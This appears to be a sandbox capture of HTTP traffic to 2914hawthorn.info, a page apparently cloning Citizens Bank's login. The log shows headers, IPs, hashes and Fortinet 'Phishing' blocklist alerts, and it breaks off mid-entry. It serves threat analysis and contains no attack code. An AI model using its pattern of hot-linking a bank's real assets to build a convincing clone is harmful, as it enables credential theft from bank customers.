etag: "3f9-5e6a235ca4d07"
accept-ranges: bytes
content-length: 1017
x-olb-req-received: t=1664242473116125
x-olb-req-duration: D=98
access-control-allow-origin: *
cache-control: max-age=272805
expires: Tue, 04 Oct 2022 01:34:38 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=4
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 18 x 12, 8-bit/color RGBA, non-interlaced\012- data
Size:   1017
Md5:    e7b1dd2b4db648b74fc5b873e7196a87
Sha1:   2f053c0827091b3929ea889dd2dc5c923dcb450a
Sha256: ff327ec2a6dbd3fc76ceecf59e472d5d2f43c94dce851ced740abe5f75bb832e
                                        
GET /us/wu/356861/onsite/generic1627665419003.js HTTP/1.1
Host: nebula-cdn.kampyle.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
151.101.85.175
HTTP/2 200 OK
content-type: application/javascript
x-amz-id-2: 7JC+R1qtk/xWAekq6EJ/iOYnAKJVp0sKRR1Ywjuz3vmZwzXBAhzpM+8LLTyEIkPnxHqxm/IoVBY=
x-amz-request-id: A9WCT9EJKQ3JVC1B
last-modified: Fri, 30 Jul 2021 17:17:00 GMT
etag: "3e0f51a7fc9d1b87f0f8f84c58f5cff6"
x-amz-version-id: xzfZ8wCDhw5e8izCl9zfknZaOkwG9yp.
server: AmazonS3
access-control-allow-origin: *
cache-control: max-age=2592000
content-encoding: gzip
accept-ranges: bytes
date: Fri, 30 Sep 2022 21:47:53 GMT
via: 1.1 varnish
age: 60429
x-served-by: cache-bma1625-BMA
x-cache: HIT
x-cache-hits: 1
x-timer: S1664574474.698394,VS0,VE3
vary: Accept-Encoding
strict-transport-security: max-age=31557600
content-length: 89384
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (54051)
Size:   89384
Md5:    1ebc9dae5a99e14046f01ab634b3d66b
Sha1:   749a1f8f96d3fb3dbdf5ed2e5abc1d90c766e1d7
Sha256: 9e10b77f6b34faa32825868a8ef93d29b8dfb0d3a11ed6bf0a97ce02e8f7ce2d
                                        
GET /efs/efs/grafx/arrow-down-blue.png HTTP/1.1
Host: www3.citizensbankonline.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/efs/efs/jsp-ns/inc/css/main.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
104.110.3.220
HTTP/2 200 OK
content-type: image/png
x-frame-options: SAMEORIGIN
last-modified: Sat, 20 Aug 2022 01:34:05 GMT
etag: "41e-5e6a235ca4d07"
accept-ranges: bytes
content-length: 1054
x-olb-req-received: t=1664242492934241
x-olb-req-duration: D=113
access-control-allow-origin: *
cache-control: max-age=272829
expires: Tue, 04 Oct 2022 01:35:02 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=15
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 28 x 11, 8-bit/color RGBA, non-interlaced\012- data
Size:   1054
Md5:    dc25c0429ceba4038c36551d05760dd7
Sha1:   a79832f9ae49997cd90701d48a02bd06bf29a7d0
Sha256: 56a8532b2a60ca2ae39c213f7e1e65e47834af927e6365444457f22ed12ed79c
                                        
GET /efs/efs/grafx/arrow-right-orange.png HTTP/1.1
Host: www3.citizensbankonline.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/efs/efs/jsp-ns/inc/css/main.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
104.110.3.220
HTTP/2 200 OK
content-type: image/png
x-frame-options: SAMEORIGIN
last-modified: Sat, 20 Aug 2022 01:34:05 GMT
etag: "a5-5e6a235ca4d07"
accept-ranges: bytes
content-length: 165
x-olb-req-received: t=1664242473534137
x-olb-req-duration: D=103
access-control-allow-origin: *
cache-control: max-age=272786
expires: Tue, 04 Oct 2022 01:34:19 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=13
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 7 x 9, 8-bit/color RGBA, non-interlaced\012- data
Size:   165
Md5:    1792e4aa4d2d86dec430ef9a60362a35
Sha1:   90b9e9c14f636362e9558d14fefe15782f75d256
Sha256: bbb90a8f240e6dbbda1d3da534f8848f256e623ed470d045e1d86a465e424d69
                                        
GET /efs/efs/jsp-ns/inc/css/font/citizen_roman.woff HTTP/1.1
Host: www3.citizensbankonline.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://2914hawthorn.info
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
104.110.3.220
HTTP/2 200 OK
x-frame-options: SAMEORIGIN
last-modified: Tue, 13 Sep 2022 02:22:48 GMT
etag: "7ce0-5e885b034bab2"
accept-ranges: bytes
content-length: 31968
x-olb-req-received: t=1664242473246819
x-olb-req-duration: D=161
access-control-allow-origin: *
cache-control: max-age=272806
expires: Tue, 04 Oct 2022 01:34:39 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=2
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format, TrueType, length 31968, version 1.0\012- data
Size:   31968
Md5:    d496c6122c776cae7c2a783bfcd7a3a1
Sha1:   fbdbec90d23bd77f471be50a3c6711e535ac72bc
Sha256: c8b1f6c22756521c86a5b0053b8565b49436f7fa19d1bb7cdf00a7808df28d42
                                        
GET /efs/efs/jsp-ns/inc/css/font/citizen_book.woff HTTP/1.1
Host: www3.citizensbankonline.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://2914hawthorn.info
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
104.110.3.220
HTTP/2 200 OK
x-frame-options: SAMEORIGIN
last-modified: Tue, 13 Sep 2022 02:22:48 GMT
etag: "7c78-5e885b034b2e2"
accept-ranges: bytes
content-length: 31864
x-olb-req-received: t=1664242472959033
x-olb-req-duration: D=126
access-control-allow-origin: *
cache-control: max-age=272921
expires: Tue, 04 Oct 2022 01:36:34 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=2
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format, TrueType, length 31864, version 1.0\012- data
Size:   31864
Md5:    0dd22599312493e4bb7b8662f71dddcc
Sha1:   29f5fd587566f80d886dc0109f53ecf47eb5bbf5
Sha256: 2a0a7ee3ea564db1e157dd2202c20b8092228fea9091f5cd1e83551e170ec277
                                        
GET /efs/efs/jsp-ns/inc/css/font/citizen_extrabold.woff HTTP/1.1
Host: www3.citizensbankonline.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://2914hawthorn.info
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
104.110.3.220
HTTP/2 200 OK
x-frame-options: SAMEORIGIN
last-modified: Tue, 13 Sep 2022 02:22:48 GMT
etag: "6ccc-5e885b034b6ca"
accept-ranges: bytes
content-length: 27852
x-olb-req-received: t=1664242473491853
x-olb-req-duration: D=151
access-control-allow-origin: *
cache-control: max-age=272783
expires: Tue, 04 Oct 2022 01:34:16 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=2
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format, TrueType, length 27852, version 1.0\012- data
Size:   27852
Md5:    76f4964f6d001aa6967fb570438d80cc
Sha1:   5259516d0615338a701e5a19a37d6bc45c6bcedc
Sha256: 0e9485cdb6a684713287cb41c6e6c3e26d12280f17349f98402456ff86ec9759
                                        
GET /bootstrap/4.1.0/js/bootstrap.min.js HTTP/1.1
Host: stackpath.bootstrapcdn.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://2914hawthorn.info
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
104.18.10.207
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
date: Fri, 30 Sep 2022 21:47:53 GMT
vary: Accept-Encoding
cdn-pullzone: 252412
cdn-uid: b1941f61-b576-4f40-80de-5677acb38f74
cdn-requestcountrycode: DE
access-control-allow-origin: *
cache-control: public, max-age=31919000
etag: W/"ce6e785579ae4cb555c9de311d1b9271"
last-modified: Mon, 25 Jan 2021 22:04:05 GMT
cdn-cachedat: 08/20/2022 03:07:07
cdn-proxyver: 1.02
cdn-requestpullcode: 200
cdn-requestpullsuccess: True
cdn-edgestorageid: 601
cdn-status: 200
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
cdn-requestid: b3527bb7d9c464f2632ca9c5cd32e888
cdn-cache: HIT
cf-cache-status: HIT
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 753028d8ed5c1c12-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (50395)
Size:   32898
Md5:    02e6702e54c34fb92a5a4bbe63a0733a
Sha1:   f42273b276b172673d221ce7b7594fc961296cc4
Sha256: 040270fc742cfffc4592bcc9fcf109fe0a3625cde6645a63d84dc114545be8e8
                                        
GET /t-Kmcy8k/uJqt11r/GPaw2Rw/Wd/5cz5rDSm/fQEkCFEB/BwwGXU/UME20 HTTP/1.1
Host: 2914hawthorn.info
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         69.49.244.31
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 30 Sep 2022 21:47:52 GMT
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   315
Md5:    a34ac19f4afae63adc5d2f7bc970c07f
Sha1:   a82190fc530c265aa40a045c21770d967f4767b8
Sha256: d5a89e26beae0bc03ad18a0b0d1d3d75f87c32047879d25da11970cb5c4662a3

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /_sec/cp_challenge/sec-3-6.css HTTP/1.1 
Host: 2914hawthorn.info
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         69.49.244.31
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 30 Sep 2022 21:47:52 GMT
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   315
Md5:    a34ac19f4afae63adc5d2f7bc970c07f
Sha1:   a82190fc530c265aa40a045c21770d967f4767b8
Sha256: d5a89e26beae0bc03ad18a0b0d1d3d75f87c32047879d25da11970cb5c4662a3
                                        
                                            POST / HTTP/1.1 
Host: ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.18.32.68
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 30 Sep 2022 21:47:53 GMT
Content-Length: 471
Connection: keep-alive
Last-Modified: Fri, 30 Sep 2022 16:31:54 GMT
Expires: Fri, 07 Oct 2022 16:31:53 GMT
Etag: "c7f64f4b02d9243a32a90f2110a79899af46b885"
Cache-Control: max-age=585239,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb5
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 753028dcf8cf1c16-OSL

                                        
                                            GET /_sec/cp_challenge/sec-cpt-3-6.js HTTP/1.1 
Host: 2914hawthorn.info
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         69.49.244.31
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 30 Sep 2022 21:47:52 GMT
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   315
Md5:    a34ac19f4afae63adc5d2f7bc970c07f
Sha1:   a82190fc530c265aa40a045c21770d967f4767b8
Sha256: d5a89e26beae0bc03ad18a0b0d1d3d75f87c32047879d25da11970cb5c4662a3

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /efs/efs/jsp-ns/scripts/common.js HTTP/1.1 
Host: 2914hawthorn.info
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         69.49.244.31
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 30 Sep 2022 21:47:52 GMT
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   315
Md5:    a34ac19f4afae63adc5d2f7bc970c07f
Sha1:   a82190fc530c265aa40a045c21770d967f4767b8
Sha256: d5a89e26beae0bc03ad18a0b0d1d3d75f87c32047879d25da11970cb5c4662a3

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /resources/onsite/js/cool-2.1.15.min.js HTTP/1.1 
Host: nebula-cdn.kampyle.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         151.101.85.175
HTTP/2 200 OK
content-type: application/javascript
                                        
x-amz-id-2: 5DsDii/Q4DH7ELXaSSQk8LthmRPPyf53c8AfqU+DuRMLCwyO0c2GhS45Jvn2u1AAXM+COlEdWaw=
x-amz-request-id: N94HBZ7MFH62Q62Y
last-modified: Sun, 24 Jan 2021 11:03:10 GMT
etag: "80dd5e3be5152c5c72d552c6a26ef6ff"
x-amz-version-id: 9HCXbKZTbCJZkS8s9IuB.pE0JEvI0TGW
server: AmazonS3
access-control-allow-origin: *
cache-control: max-age=2592000
content-encoding: gzip
accept-ranges: bytes
date: Fri, 30 Sep 2022 21:47:54 GMT
via: 1.1 varnish
age: 400960
x-served-by: cache-bma1625-BMA
x-cache: HIT
x-cache-hits: 1
x-timer: S1664574474.103146,VS0,VE1
vary: Accept-Encoding
strict-transport-security: max-age=31557600
content-length: 5197
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  C source, ASCII text, with very long lines (585)
Size:   5197
Md5:    a8a8316559534b9784a92826ab49b9f2
Sha1:   3836a3dbc421106117da4a97871aed09eedbdf0c
Sha256: b11175156d2ff85a9f749c78ab961597cc0034db4df0295f2e57335e94f61b1e
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 4346
Cache-Control: 'max-age=158059'
Date: Fri, 30 Sep 2022 21:47:54 GMT
Last-Modified: Fri, 30 Sep 2022 20:35:28 GMT
Server: ECS (ska/F6FD)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /citi/citizensbankonline.com_deathshortencode/W/img/loading.gif HTTP/1.1 
Host: 2914hawthorn.info
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         69.49.244.31
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Fri, 30 Sep 2022 21:47:52 GMT
Server: Apache
Last-Modified: Sat, 11 Aug 2018 17:03:52 GMT
Accept-Ranges: bytes
Content-Length: 38636
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  GIF image data, version 89a, 200 x 200\012- data
Size:   38636
Md5:    d10ef01e81faa2c2d812bdf670b4e072
Sha1:   77d09a57b2091fd7665dff763a5eab23e0ff907e
Sha256: 5e3d5246b17e19e65385092db07554d8e1c5c4a226a6d7f97824b8e1e8571e34
                                        
                                            GET /dest5.html?d_nsid=0 HTTP/1.1 
Host: citizensbank.demdex.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         54.76.210.146
HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
                                        
Accept-Ranges: bytes
Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
content-encoding: gzip
date: Fri, 30 Sep 2022 21:47:54 GMT
DCS: dcs-prod-irl1-1-v044-0460362a2.edge-irl1.demdex.com 0 ms
Expires: Thu, 01 Jan 1970 00:00:00 UTC
last-modified: Thu, 29 Sep 2022 16:18:55 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
Pragma: no-cache
Strict-Transport-Security: max-age=31536000; includeSubDomains
vary: accept-encoding
X-TID: /jDIeMWkTK4=
transfer-encoding: chunked
Connection: keep-alive


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (550)
Size:   2791
Md5:    ccbdcb1e84c241950763ec4cd516cdfc
Sha1:   55dfa8d4b09c5c3a80fcd101152f6ebed3d27a2c
Sha256: de9ccb9b168945a24f20edc28c39be4135b328129ba8ee378401a7aedc925d12
                                        
                                            POST / HTTP/1.1 
Host: ocsps.ssl.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         34.237.184.165
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Date: Fri, 30 Sep 2022 21:47:54 GMT
Content-Length: 1883
Connection: keep-alive
Expires: Fri, 07 Oct 2022 15:29:58 GMT
Cache-Control: max-age=86400,public,no-transform,must-revalidate
ETag: "735ab3c4f753d36cc49abba139d921fb28569a3d"
Last-Modified: Fri, 30 Sep 2022 15:29:59 GMT
X-Proxy-Cache: HIT


--- Additional Info ---
Magic:  data
Size:   1883
Md5:    00675c0d3413eacf3d31a7a5a5bc2228
Sha1:   735ab3c4f753d36cc49abba139d921fb28569a3d
Sha256: 88b4f1c8f637b96bc4973c99ac7e53450410391d03ba0d146f2370f61992611b
                                        
                                            GET /egw/5/qceuv8449dzg58ptt1bhda9g8ue19c7s/track/__cool.gif?data=… HTTP/1.1 
Host: udc-neb.kampyle.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         35.241.45.82
HTTP/2 200 OK
content-type: image/gif; charset=UTF-8
                                        
date: Fri, 30 Sep 2022 21:47:54 GMT
access-control-allow-credentials: true
access-control-allow-origin: *
access-control-allow-methods: GET, POST, PUT, DELETE
access-control-allow-headers: X-Requested-With, Origin, Content-Type, Accept
access-control-max-age: 1800
x-me: prod-instance-gatewayservice-blue-gczz
x-application-context: application:9090
content-length: 0
server: Jetty(9.2.11.v20150529)
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2

                                        
                                            GET /efs/hhf/css/citizensns.min.44745.css HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 404 Not Found
content-type: text/html
                                        
x-frame-options: SAMEORIGIN
last-modified: Tue, 20 Apr 2021 15:35:21 GMT
etag: "26ce-5c06931abe040"
accept-ranges: bytes
content-length: 9934
x-olb-req-received: t=1664574474411819
x-olb-req-duration: D=175
access-control-allow-origin: *
cache-control: max-age=896
expires: Fri, 30 Sep 2022 22:02:50 GMT
date: Fri, 30 Sep 2022 21:47:54 GMT
server-timing: cdn-cache; desc=MISS, edge; dur=577, origin; dur=393
strict-transport-security: max-age=15768000
lb-action: None, None
set-cookie: ak_bmsc=060EB06D026150DB57019509DE3AA11B~000000000000000000000000000000~YAAQnE8kF3Or9FiDAQAASclekBFLZZvNfgpFWbP31yuGuyr5zA1YtcNqofWkB/YskpcGjude5a48aEVhN+O7HRzCSQGXZMdn4Ee9dd2wAsiqCD4PNjcIux/fJglrW8QOkp+PhIcYzpV2DMzY6HwImJPizIHSuccX+Y6WM2LlmBpk+oxZh2kdgBNj5jtwIj11iiS8ZYqcYTzi3pfcsymr0pJW7zxuOZGbDGGnbXhNrO32acZqadS46DXmO3NE2JH4kUq6mKO/5PpmBAPj3i2+0XTc6g2Y+pTtEG55ekS3GUhGhPG1ADGsK5+z0cPyWzjKrOIl+cL/6ENplIRHjkY8Lh+aOtoSpzhv4ZAo9O3l4jD3G87eSUUEZuPcM9SL6vdfdd9RnoQM5P+SqvKrXTmpuHm2V0Wb; Domain=.citizensbankonline.com; Path=/; Expires=Fri, 30 Sep 2022 23:47:53 GMT; Max-Age=7199; HttpOnly
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   9934
Md5:    7a50763a326038e01ff7f9624d28066c
Sha1:   cae9d82811966f159a734f9402ace74eb01f17f8
Sha256: c6cc63926f47095f4caf94ad78258d77933e3adcc1ce7781bd7cb2a97d596411
                                        
                                            GET /efs/efs/web-ui/img/mobile-desktop-icons/icon-hires.png HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: image/png
                                        
x-frame-options: SAMEORIGIN
last-modified: Tue, 13 Sep 2022 02:22:48 GMT
etag: "3653-5e885b03510a1"
accept-ranges: bytes
content-length: 13907
x-olb-req-received: t=1664242473344926
x-olb-req-duration: D=143
access-control-allow-origin: *
cache-control: max-age=272860
expires: Tue, 04 Oct 2022 01:35:34 GMT
date: Fri, 30 Sep 2022 21:47:54 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 192 x 192, 8-bit/color RGBA, non-interlaced\012- data
Size:   13907
Md5:    172ee65ce7e2afc164fb89579d8060b2
Sha1:   1bcc0c40ce0dd35f4150e286d4da86eb5150d2da
Sha256: 6031e1710c50b5ade8d4fe1f9d2a7885caa5f18493944871891d9bf847dcec0e
                                        
                                            GET /efs/efs/web-ui/img/mobile-desktop-icons/icon-normal.png HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: image/png
                                        
x-frame-options: SAMEORIGIN
last-modified: Tue, 13 Sep 2022 02:22:48 GMT
etag: "2a77-5e885b03510a1"
accept-ranges: bytes
content-length: 10871
x-olb-req-received: t=1664242473036936
x-olb-req-duration: D=155
